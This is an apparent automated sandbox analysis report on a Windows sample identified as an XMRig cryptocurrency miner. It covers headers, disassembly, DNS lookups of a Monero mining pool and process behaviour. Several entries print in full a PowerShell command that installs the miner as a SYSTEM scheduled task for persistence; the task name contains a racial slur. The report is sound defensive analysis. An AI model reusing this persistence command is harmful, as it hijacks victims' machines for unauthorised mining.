                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x65D08612 [Sat Feb 17 10:10:26 2024 UTC]
                                                                                      TLS Callbacks:0x4000edc0, 0x1, 0x4000ed90, 0x1
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f7505c167603909b7180406402fef19e

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      dec eax
                                                                                      mov eax, dword ptr [0058ACA5h]
                                                                                      mov dword ptr [eax], 00000001h
                                                                                      call 00007F382CFBE06Fh
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      nop dword ptr [eax]
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      dec eax
                                                                                      mov eax, dword ptr [0058AC85h]
                                                                                      mov dword ptr [eax], 00000000h
                                                                                      call 00007F382CFBE04Fh
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      nop dword ptr [eax]
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      call 00007F382CFD4EE4h
                                                                                      dec eax
                                                                                      test eax, eax
                                                                                      sete al
                                                                                      movzx eax, al
                                                                                      neg eax
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [00000009h]
                                                                                      jmp 00007F382CFBE389h
                                                                                      nop dword ptr [eax+00h]
                                                                                      ret
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      lea eax, dword ptr [0058F7E9h]
                                                                                      dec eax
                                                                                      lea edx, dword ptr [eax+21h]
                                                                                      mov byte ptr [eax], 00000000h
                                                                                      dec eax
                                                                                      add eax, 01h
                                                                                      dec eax
                                                                                      cmp eax, edx
                                                                                      jne 00007F382CFBE3A6h
                                                                                      ret
                                                                                      dec eax
                                                                                      lea eax, dword ptr [0058F791h]
                                                                                      dec eax
                                                                                      lea edx, dword ptr [eax+18h]
                                                                                      mov word ptr [eax], 0000h
                                                                                      dec eax
                                                                                      add eax, 02h
                                                                                      dec eax
                                                                                      cmp eax, edx
                                                                                      jne 00007F382CFBE3A4h
                                                                                      ret
                                                                                      dec eax
                                                                                      lea eax, dword ptr [0058F757h]
                                                                                      dec eax
                                                                                      lea edx, dword ptr [eax+14h]
                                                                                      mov word ptr [eax], 0000h
                                                                                      dec eax
                                                                                      add eax, 02h
                                                                                      dec eax

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5920000xa34.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5950000x388.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x58d0000x1164.pdata
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5960000x330.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x58b7600x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x59228c0x250.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x192100x1940064a906e03990c2829ba362db9536062dFalse0.47239518873762376data6.169538635167468IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .data0x1b0000x56dcc00x56de00bbb6f156c4e46eba09dd0b108ee705dfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rdata0x5890000x39d00x3a007391eb546fcab3fd215395ecbd209601False0.3618669181034483data5.11526840732268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .pdata0x58d0000x11640x1200749ee8117bcf7707da73d683b524ba14False0.4657118055555556data5.050288854964238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .xdata0x58f0000xef80x100007dd20b4b9bea4671206281ec7c92e7dFalse0.241455078125data4.017470182913128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .bss0x5900000x1c200x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata0x5920000xa340xc00ac973ea057d545434dccfa01fc4d806fFalse0.3043619791666667data3.8909104495908764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .CRT0x5930000x600x200c4cd26a7dd58425fcc2e1be3a3579e3cFalse0.068359375data0.28655982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .tls0x5940000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x5950000x3880x400d10e223bbf97f0d8420bf4961741370aFalse0.4501953125data5.021175165149536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .reloc0x5960000x3300x400253140b04ff5c46f387d1afe44a5fe41False0.5673828125data4.740165763904759IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_MANIFEST0x5950580x330XML 1.0 document, ASCII textEnglishUnited States0.508578431372549

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllCloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                                                                                      msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 18, 2024 19:39:17.677126884 CET4971210128192.168.2.544.196.193.227
                                                                                      Feb 18, 2024 19:39:17.771233082 CET101284971244.196.193.227192.168.2.5
                                                                                      Feb 18, 2024 19:39:17.771331072 CET4971210128192.168.2.544.196.193.227
                                                                                      Feb 18, 2024 19:39:17.771548986 CET4971210128192.168.2.544.196.193.227
                                                                                      Feb 18, 2024 19:39:17.865555048 CET101284971244.196.193.227192.168.2.5
                                                                                      Feb 18, 2024 19:39:17.866103888 CET101284971244.196.193.227192.168.2.5
                                                                                      Feb 18, 2024 19:39:17.919338942 CET4971210128192.168.2.544.196.193.227
                                                                                      Feb 18, 2024 19:42:00.068768024 CET101284971244.196.193.227192.168.2.5
                                                                                      Feb 18, 2024 19:42:00.231409073 CET4971210128192.168.2.544.196.193.227
                                                                                      Feb 18, 2024 19:42:15.463208914 CET101284971244.196.193.227192.168.2.5
                                                                                      Feb 18, 2024 19:42:15.528337002 CET4971210128192.168.2.544.196.193.227
                                                                                      Feb 18, 2024 19:43:00.058094025 CET101284971244.196.193.227192.168.2.5
                                                                                      Feb 18, 2024 19:43:00.231277943 CET4971210128192.168.2.544.196.193.227

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 18, 2024 19:39:17.569380999 CET6506053192.168.2.51.1.1.1
                                                                                      Feb 18, 2024 19:39:17.673299074 CET53650601.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Feb 18, 2024 19:39:17.569380999 CET192.168.2.51.1.1.10x4121Standard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Feb 18, 2024 19:39:17.673299074 CET1.1.1.1192.168.2.50x4121No error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                                                                      Feb 18, 2024 19:39:17.673299074 CET1.1.1.1192.168.2.50x4121No error (0)monerooceans.stream44.196.193.227A (IP address)IN (0x0001)false

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:19:38:55
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      Imagebase:0x7ff68af50000
                                                                                      File size:5'827'072 bytes
                                                                                      MD5 hash:7E78C4388E398CD5113BE95855753C9A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:19:38:55
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:19:38:55
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:19:39:02
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Program Files\MINA\m.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Program Files\MINA\m.exe
                                                                                      Imagebase:0x7ff7c87f0000
                                                                                      File size:5'827'072 bytes
                                                                                      MD5 hash:7E78C4388E398CD5113BE95855753C9A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 53%, ReversingLabs
                                                                                      • Detection: 62%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:19:39:03
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:19:39:03
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:19:39:15
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\conhost.exe
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:19:39:15
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:19:39:15
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:19:39:16
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                      Imagebase:0x7ff674740000
                                                                                      File size:5'141'208 bytes
                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:19:39:34
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Program Files\MINA\m.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Program Files\MINA\m.exe
                                                                                      Imagebase:0x7ff7c87f0000
                                                                                      File size:5'827'072 bytes
                                                                                      MD5 hash:7E78C4388E398CD5113BE95855753C9A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:19:39:34
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                      Imagebase:0x7ff6068e0000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:19:39:34
                                                                                      Start date:18/02/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Executed Functions

                                                                                        Function 00007FF68AF514B0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2089628243.00007FF68AF51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68AF50000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2089585408.00007FF68AF50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2089699361.00007FF68AF6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2089745256.00007FF68AF6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2090194042.00007FF68B4D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2090253830.00007FF68B4D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2090279914.00007FF68B4E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2090299139.00007FF68B4E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2090317611.00007FF68B4E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff68af50000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction ID: 91e00c69e8aa0ec2ef1d46d807cddab4cb1d34da75d5374665b36a30f43b8dd6
                                                                                        • Opcode Fuzzy Hash: 4004354ba9eaea3172bc7ecdf0289a0e6348fe9df046a5722f142659b5a62597
                                                                                        • Instruction Fuzzy Hash: 45B01230D0530AE4E3003F11E84226C32207F0AB80F418074D80C43363CE7C6440CB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        Function 00007FF849004943 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/&I
                                                                                        • API String ID: 0-3048473677
                                                                                        • Opcode ID: dd0490390fbbf2de29876a047170c0fb1be9ba3c638c6e80671cd0d5ddaf5984
                                                                                        • Instruction ID: db8ce0a42027081bc7c55cf2933bf3690faf75086ec51a0ee0e72eb37fb595f7
                                                                                        • Opcode Fuzzy Hash: dd0490390fbbf2de29876a047170c0fb1be9ba3c638c6e80671cd0d5ddaf5984
                                                                                        • Instruction Fuzzy Hash: 7751E532E1DA864FEBA9EE2C745127577D1EF95260B1901FAC00EC7193FE18EC05835A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF84900498F Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2084036128.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/&I
                                                                                        • API String ID: 0-3048473677
                                                                                        • Opcode ID: b694dc691f9f3148146ca1b67b7d5c0957ae244db2dff90b1fc36a110c451ccd
                                                                                        • Instruction ID: f12af3ddc86a119ea14fe00d3b1c3229917e215d88f9ce3aebb92dbd7c106a3d
                                                                                        • Opcode Fuzzy Hash: b694dc691f9f3148146ca1b67b7d5c0957ae244db2dff90b1fc36a110c451ccd
                                                                                        • Instruction Fuzzy Hash: F8218C32E0E9864FEBB9EE19749117876D1EF55360B4901FAC01EC71A3FE18EC04824A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F3A0E5 Relevance: .1, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083627028.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13e5cf013b8449a07a92b445ff6eea734da411703010ec591e3c262d4933ef63
                                                                                        • Instruction ID: 07f3bf82b7db801055b231d8c26f85c5fb03fabe23e52834f6fef7a46ad350c5
                                                                                        • Opcode Fuzzy Hash: 13e5cf013b8449a07a92b445ff6eea734da411703010ec591e3c262d4933ef63
                                                                                        • Instruction Fuzzy Hash: 1C31063191CB8C4FDB59DB5C984A6A97BE0FB69320F00426FE449C3292DB74A855CBC2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848E1E540 Relevance: .1, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2083152471.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ff848e1d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e0d60b69cf5de6206c746e2dad754b5f140aa130871ede5b353491ecf34a718
                                                                                        • Instruction ID: 6ef4cf02fa872fc5dc030493c26f53bfba01d87a1753f567a3cf244eb48072e2
                                                                                        • Opcode Fuzzy Hash: 3e0d60b69cf5de6206c746e2dad754b5f140aa130871ede5b353491ecf34a718
                                                                                        • Instruction Fuzzy Hash: AD41E47080DBC54FE7969B29A8559523FF0FF56320F1506DFE088CB1A3DB29A846C792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F3B028 Relevance: .1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
